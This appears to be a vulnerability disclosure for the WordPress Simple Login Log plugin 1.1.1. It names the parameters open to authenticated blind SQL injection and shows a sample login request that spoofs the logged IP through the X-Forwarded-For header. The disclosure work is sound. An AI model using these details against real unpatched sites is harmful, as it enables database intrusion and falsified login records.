Wordpress: Multiple Vulnerabilities in Simple Login Log Plugin
We discovered a vulnerability in a WordPress plugin called Simple Login Log Plugin.
Vulnerability: Authenticated Blind SQL Injection, Source IP Address Manipulation
Affected Version: 1.1.1 (below version may be affected as well)
Patched Version: Not available yet (vendor already contacted but no response)
Blind SQL Injection
===================
Affected URL: http://localhost/wp-admin/users.php?page=login_log&orderby=ip&order=asc
Affected Parameters: orderby and order
Screenshot
Source IP Address Manipulation
==============================
This plugin records the user’s IP address that has successfully logged in, using X-Forwarded-For HTTP header field.
$values = array( 'uid' => $uid, 'user_login' => $user_login, 'user_role' => $user_role, 'time' => current_time('mysql'), 'ip' => isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? esc_attr($_SERVER['HTTP_X_FORWARDED_FOR']) : esc_attr($_SERVER['REMOTE_ADDR']), 'login_result' => $this->login_success, 'data' => $serialized_data, ); $format = array('%d', '%s', '%s', '%s', '%s', '%s', '%s'); $this->save_data($values, $format);
Judging from line 6 above, we can put any value in the X-Forwarded-For field.
Example:
POST /wp/wp-login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp/wp-login.php
X-Forwarded-For: blablabla
Cookie: wordpress_test_cookie=WP+Cookie+check; PHPSESSID=45abjfebtenkrqikf108dlhca6
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
log=admin&pwd=admin&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp%2Fwp-admin%2F&testcookie=1